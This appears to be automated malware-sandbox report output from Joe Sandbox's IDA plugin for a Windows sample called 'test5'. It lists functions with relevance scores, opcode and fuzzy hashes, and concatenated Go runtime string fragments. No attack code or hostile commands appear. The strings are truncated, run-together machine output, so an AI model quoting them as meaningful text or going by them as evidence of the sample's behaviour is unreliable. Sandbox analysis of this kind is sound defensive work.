String ID: stopTheWorld: broken CPU time accountingglobal runq empty with non-zero runqsizemust be able to track idle limiter eventruntime: SyscallN has too many argumentsgoroutine stack size is not a power of 2138777878078144567552953958511352539062569388939039072283776$stopTheWorld: holding locksgcstopm: not waiting for gcruntime: checkdead: nmidle=runtime: checkdead: find g runlock of unlocked rwmutexsigsend: inconsistent statemakeslice: len out of rangemakeslice: cap out of rangegrowslice: len out of rangestack size not a $stopTheWorld: not stopped (status != _Pgcstop)signal arrived during external code executioncompileCallback: float arguments not supportedruntime: name offset base pointer out of rangeruntime: type offset base pointer out of rangeruntime: text offset base poin$stopTheWorld: not stopped (stopwait != 0)34694469519536141888238489627838134765625strconv: illegal AppendInt/FormatInt basecan't call pointer on a non-pointer ValueMapIter.Next called on exhausted iteratortime: Reset called on uninitialized Timernet/url: inval
API String ID: 0-1975636751
Opcode ID: c9a1f14e63505ac3ebfedc1963bd5287c1badf82fc21faf96302d93c0e621c45
Instruction ID: 38f6fe4c81b6c9c10207dbb56f2b1e7c9f29aa4e8cdfb6ab4e79eefaea763a62
Opcode Fuzzy Hash: c9a1f14e63505ac3ebfedc1963bd5287c1badf82fc21faf96302d93c0e621c45
Instruction Fuzzy Hash: 33C1D772209B84C5DB51DF26E8513AEB766F385B90F08912AEE8D43766DF7DC485CB00

Function 006B76E0 Relevance: 5.2, Strings: 4, Instructions: 222COMMON

Download Yara Rule

Strings

reflect., xrefs: 006B78CC
runtime/internal/thread exhaustionlocked m0 woke upentersyscallblock spinningthreads=gp.waiting != nilunknown caller pcstack: frame={sp:runtime: nameOff runtime: typeOff runtime: textOff 1192092895507812559604644775390625permission deniedwrong medium typeno da, xrefs: 006B78A5
bad restart PC-thread limitstopm spinning nmidlelocked= needspinning=randinit twicestore64 failedsemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module data in goroutine runtime: seq1=runtime: goid=1907348632812595367431, xrefs: 006B7993
runtime., xrefs: 006B7872

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: bad restart PC-thread limitstopm spinning nmidlelocked= needspinning=randinit twicestore64 failedsemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module data in goroutine runtime: seq1=runtime: goid=1907348632812595367431$reflect.$runtime.$runtime/internal/thread exhaustionlocked m0 woke upentersyscallblock spinningthreads=gp.waiting != nilunknown caller pcstack: frame={sp:runtime: nameOff runtime: typeOff runtime: textOff 1192092895507812559604644775390625permission deniedwrong medium typeno da
API String ID: 0-4191565186
Opcode ID: 9e8be957bda312eb65024304ae33ef9032152905b9f2351b06796b657fe3e796
Instruction ID: f8151b8c97dcaf77e3ea09cf20578a938c72deb261c638dcce86c5995490fef2
Opcode Fuzzy Hash: 9e8be957bda312eb65024304ae33ef9032152905b9f2351b06796b657fe3e796
Instruction Fuzzy Hash: E971BFB2B18A4086DB24DF25A0803EAB763F7C5B94F584239DB8E57B55DB38D8C2C704

Function 006B0980 Relevance: 5.1, Strings: 4, Instructions: 138COMMON

Download Yara Rule

Strings

runtime: NtCancelWaitCompletionPacket failed; errno= exited a goroutine internally locked to the OS threadcompileCallback: argument size is larger than uintptrmin size of malloc header is not a size class boundarygcControllerState.findRunnable: blackening not , xrefs: 006B0BCF
runtime: netpoll failedpanic during preemptoffnanotime returning zerofatal: morestack on g0the current g is not g0schedule: holding locksprocresize: invalid argspan has no free stacksstack growth after forkshrinkstack at bad timereflect.methodValueCall2328306, xrefs: 006B0B4F, 006B0BAF, 006B0BF9
runtime: SetWaitableTimer failed; errno= stopTheWorld: not stopped (stopwait != 0)34694469519536141888238489627838134765625strconv: illegal AppendInt/FormatInt basecan't call pointer on a non-pointer ValueMapIter.Next called on exhausted iteratortime: Reset ca, xrefs: 006B0B89
runtime: NtAssociateWaitCompletionPacket failed; errno= non-empty pointer map passed for non-pointer-size valuesruntime: checkmarks found unexpected unmarked object obj=sync: WaitGroup misuse: Add called concurrently with Waittried to trace goroutine with inva, xrefs: 006B0B26

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: runtime: NtAssociateWaitCompletionPacket failed; errno= non-empty pointer map passed for non-pointer-size valuesruntime: checkmarks found unexpected unmarked object obj=sync: WaitGroup misuse: Add called concurrently with Waittried to trace goroutine with inva$runtime: NtCancelWaitCompletionPacket failed; errno= exited a goroutine internally locked to the OS threadcompileCallback: argument size is larger than uintptrmin size of malloc header is not a size class boundarygcControllerState.findRunnable: blackening not $runtime: SetWaitableTimer failed; errno= stopTheWorld: not stopped (stopwait != 0)34694469519536141888238489627838134765625strconv: illegal AppendInt/FormatInt basecan't call pointer on a non-pointer ValueMapIter.Next called on exhausted iteratortime: Reset ca$runtime: netpoll failedpanic during preemptoffnanotime returning zerofatal: morestack on g0the current g is not g0schedule: holding locksprocresize: invalid argspan has no free stacksstack growth after forkshrinkstack at bad timereflect.methodValueCall2328306
API String ID: 0-3833993146
Opcode ID: 0353096b0f3d277faceec8951c9e06cec168420f81100d86bce71ba3d6d2d286
Instruction ID: 1cce11ecfcd4a38139d7e8ba3aade72e6bc9622d756c1140881e4f684aeee237
Opcode Fuzzy Hash: 0353096b0f3d277faceec8951c9e06cec168420f81100d86bce71ba3d6d2d286
Instruction Fuzzy Hash: A4517272218B84C5D640DF65F48139ABB65F789BD0F449229EA9C43BA6DF38C481CB54

Function 0068BA60 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

packed=BAD RANK status unknown(trigger= npages= nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes status= etypes 48828125no anodenil PoolThursdaySaturdayFebruaryNovemberDecember%!Month(netedns0[::1]:53continue_gatewayinva, xrefs: 0068BB25
-> node= ms cpu, (forced) wbuf1.n= wbuf2.n= s.limit= s.state= B work ( B exp.) marked unmarked in use), size = bad prune, tail = recover: not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)tracebac, xrefs: 0068BB45
cnt=gcing MB, got= ... max=scav ptr ] = (usageinit ms, fault and tab= top=[...], fp:1562578125int16int32int64uint8arraysliceMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930Localfilesimap2imap3imapspop3shostssse41sse42ssse3parseutf-8%s*%dtext/, xrefs: 0068BB05
runtime: lfstack.push invalid packing: node=out of memory allocating heap arena metadata/cpu/classes/scavenge/background:cpu-secondsruntime: unexpected metric registration for gcmarknewobject called while doing checkmarkactive sweepers found at start of mark p, xrefs: 0068BAE5

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: -> node= ms cpu, (forced) wbuf1.n= wbuf2.n= s.limit= s.state= B work ( B exp.) marked unmarked in use), size = bad prune, tail = recover: not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)tracebac$ cnt=gcing MB, got= ... max=scav ptr ] = (usageinit ms, fault and tab= top=[...], fp:1562578125int16int32int64uint8arraysliceMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930Localfilesimap2imap3imapspop3shostssse41sse42ssse3parseutf-8%s*%dtext/$ packed=BAD RANK status unknown(trigger= npages= nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes status= etypes 48828125no anodenil PoolThursdaySaturdayFebruaryNovemberDecember%!Month(netedns0[::1]:53continue_gatewayinva$runtime: lfstack.push invalid packing: node=out of memory allocating heap arena metadata/cpu/classes/scavenge/background:cpu-secondsruntime: unexpected metric registration for gcmarknewobject called while doing checkmarkactive sweepers found at start of mark p
API String ID: 0-3765948214
Opcode ID: ceeb432f02caf0a330ac173be02f98750f9486feb9931f3ca144a3ccaea6bc39
Instruction ID: d04558f90fecc399a04fd54cb30eaa06d51e4f23c34cc6a46cdf26bfca233ad9
Opcode Fuzzy Hash: ceeb432f02caf0a330ac173be02f98750f9486feb9931f3ca144a3ccaea6bc39
Instruction Fuzzy Hash: 09218F72618B45CADA40AF11F8813A9A7A9F789B80F489535EE9D47729CF3CC441C754

Function 006B3460 Relevance: 4.0, Strings: 3, Instructions: 274COMMON

Download Yara Rule

Strings

runtime.preemptM: duplicatehandle failed; errno=runtime: malformed profBuf buffer - invalid sizeattempt to trace invalid or unsupported P statusruntime: waitforsingleobject wait_failed; errno=strconv: illegal AppendFloat/FormatFloat bitSizenot enough significa, xrefs: 006B38C7
self-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchwrong timers152587890625762939453125invalid slothost is downillegal seekshort bu, xrefs: 006B3905
runtime.preemptM: duplicatehandle failedstopTheWorld: broken CPU time accountingglobal runq empty with non-zero runqsizemust be able to track idle limiter eventruntime: SyscallN has too many argumentsgoroutine stack size is not a power of 213877787807814456755, xrefs: 006B38EF

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: runtime.preemptM: duplicatehandle failed; errno=runtime: malformed profBuf buffer - invalid sizeattempt to trace invalid or unsupported P statusruntime: waitforsingleobject wait_failed; errno=strconv: illegal AppendFloat/FormatFloat bitSizenot enough significa$runtime.preemptM: duplicatehandle failedstopTheWorld: broken CPU time accountingglobal runq empty with non-zero runqsizemust be able to track idle limiter eventruntime: SyscallN has too many argumentsgoroutine stack size is not a power of 213877787807814456755$self-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchwrong timers152587890625762939453125invalid slothost is downillegal seekshort bu
API String ID: 0-257803030
Opcode ID: 5da88f6799b1e11f1e6c44d99768cbec3cc73a39ff338e495a799644e6f1c903
Instruction ID: 7308624ef82655a048e7e2492ad0abb52618a581ded113e5976c92ce06330c15
Opcode Fuzzy Hash: 5da88f6799b1e11f1e6c44d99768cbec3cc73a39ff338e495a799644e6f1c903
Instruction Fuzzy Hash: BEC19E76605F8081CB60DF25E8413AEB761F74AB94F159236DAAC837A5DF39C5C2CB04

Function 0069DFE0 Relevance: 3.9, Strings: 3, Instructions: 179COMMON

Download Yara Rule

Strings

MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}sched={pc:, gp->status= pluginpath= : unknown pc called from runtime: pid=3814697265625level 3 reset, xrefs: 0069E265
pacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valueselectgo: bad wakeupsemaRoot rotateRightreflect.makeFuncStubtrace: out of memory, xrefs: 0069E1E6
(scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type 19531259765625invaliduintptrChanDir Value>TuesdayJanuaryOctoberMUI_StdMUI_Dltwindowswsarecvwsasendlookup avx512fn, xrefs: 0069E205

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type 19531259765625invaliduintptrChanDir Value>TuesdayJanuaryOctoberMUI_StdMUI_Dltwindowswsarecvwsasendlookup avx512fn$ MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}sched={pc:, gp->status= pluginpath= : unknown pc called from runtime: pid=3814697265625level 3 reset$pacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valueselectgo: bad wakeupsemaRoot rotateRightreflect.makeFuncStubtrace: out of memory
API String ID: 0-396137863
Opcode ID: 82c97b395591ffc0c125360dc4df6d7cbc9700df5f7e80e2168de26cf36a560b
Instruction ID: 41b644e70b18d63a4c7e497db29cd1d56e008b25b439436759a3b724ee6f3a45
Opcode Fuzzy Hash: 82c97b395591ffc0c125360dc4df6d7cbc9700df5f7e80e2168de26cf36a560b
Instruction Fuzzy Hash: BB71C872518F9489DA41EF65E44035AB7AAFB8ABC0F049339EA8D27B25CF38C491C754

Function 006C92E0 Relevance: 3.7, Strings: 2, Instructions: 1166COMMON

Download Yara Rule

Strings

selectgo: bad wakeupsemaRoot rotateRightreflect.makeFuncStubtrace: out of memorywirep: already in go37252902984619140625invalid request codebad font file formatis a named type filekey has been revokedconnection timed outJordan Standard TimeArabic Standard Time, xrefs: 006CA027
gp.waiting != nilunknown caller pcstack: frame={sp:runtime: nameOff runtime: typeOff runtime: textOff 1192092895507812559604644775390625permission deniedwrong medium typeno data availableexec format errorGetCurrentProcessunknown type kindreflect: call of refle, xrefs: 006CA050

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: gp.waiting != nilunknown caller pcstack: frame={sp:runtime: nameOff runtime: typeOff runtime: textOff 1192092895507812559604644775390625permission deniedwrong medium typeno data availableexec format errorGetCurrentProcessunknown type kindreflect: call of refle$selectgo: bad wakeupsemaRoot rotateRightreflect.makeFuncStubtrace: out of memorywirep: already in go37252902984619140625invalid request codebad font file formatis a named type filekey has been revokedconnection timed outJordan Standard TimeArabic Standard Time
API String ID: 0-1402775695
Opcode ID: 5c41b97fd3451081fb970b0b079e51690ea70757c126afe837280729c8657d42
Instruction ID: 55edb11cd4bad06916be304f9d4db591605eca5fc4f36e26c6a44618754cac47
Opcode Fuzzy Hash: 5c41b97fd3451081fb970b0b079e51690ea70757c126afe837280729c8657d42
Instruction Fuzzy Hash: 40B26732208B94C2D760CF12E448BAAB7AAF389BD4F55912ADF9D47759CF78C894C740

Function 006C7180 Relevance: 2.9, Strings: 2, Instructions: 423COMMON

Download Yara Rule

Strings

runtime: malformed profBuf buffer - invalid sizeattempt to trace invalid or unsupported P statusruntime: waitforsingleobject wait_failed; errno=strconv: illegal AppendFloat/FormatFloat bitSizenot enough significant bits after mult64bitPow10syscall: string with, xrefs: 006C74F5
runtime: malformed profBuf buffer - tag and data out of syncreflect: call of reflect.Value.Len on ptr to non-array ValueabiRegArgsType needs GC Prog, update methodValueCallFrameObjsgo package net: GODEBUG setting forcing use of Go's resolverfound bad pointer , xrefs: 006C7525

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: runtime: malformed profBuf buffer - invalid sizeattempt to trace invalid or unsupported P statusruntime: waitforsingleobject wait_failed; errno=strconv: illegal AppendFloat/FormatFloat bitSizenot enough significant bits after mult64bitPow10syscall: string with$runtime: malformed profBuf buffer - tag and data out of syncreflect: call of reflect.Value.Len on ptr to non-array ValueabiRegArgsType needs GC Prog, update methodValueCallFrameObjsgo package net: GODEBUG setting forcing use of Go's resolverfound bad pointer
API String ID: 0-2748690606
Opcode ID: 216537cfc3a67d9df0fb55d18db4eb57855e3bd1cc6c5091a2bbaf3b8456b36c
Instruction ID: 62e714d97dab8942fc1fd14df8cc1c267008ca7f8fbcb10bd31f51b66d490078
Opcode Fuzzy Hash: 216537cfc3a67d9df0fb55d18db4eb57855e3bd1cc6c5091a2bbaf3b8456b36c
Instruction Fuzzy Hash: AED13362709A5882CA54DF27A801B7A6763F789FC8F99982DEE0E57701DF78CD42C704

Function 006AFD20 Relevance: 2.7, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

runtime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime:, xrefs: 006AFEBE
runtime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=17763568394002504646778106689453125888178419700125, xrefs: 006AFF2D

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: runtime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=17763568394002504646778106689453125888178419700125$runtime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime:
API String ID: 0-659643491
Opcode ID: 65fce8aaa974bd623740baa40fb6586c6514d9027973c4172fb7c270b1a80bdb
Instruction ID: 56b6124627f606732b83621075b649e0a01c6fdf9a215e1d7d9381791c8fcc28
Opcode Fuzzy Hash: 65fce8aaa974bd623740baa40fb6586c6514d9027973c4172fb7c270b1a80bdb
Instruction Fuzzy Hash: E351C93320978089CB54EBA1E04036BBB62F787B90F484579EB9D437A6DB38CC418F52

Function 00697605 Relevance: 2.6, Strings: 2, Instructions: 111COMMON

Download Yara Rule

Strings

`&n, xrefs: 00697575
gcing MB, got= ... max=scav ptr ] = (usageinit ms, fault and tab= top=[...], fp:1562578125int16int32int64uint8arraysliceMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930Localfilesimap2imap3imapspop3shostssse41sse42ssse3parseutf-8%s*%dtext/Greek, xrefs: 00697614

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
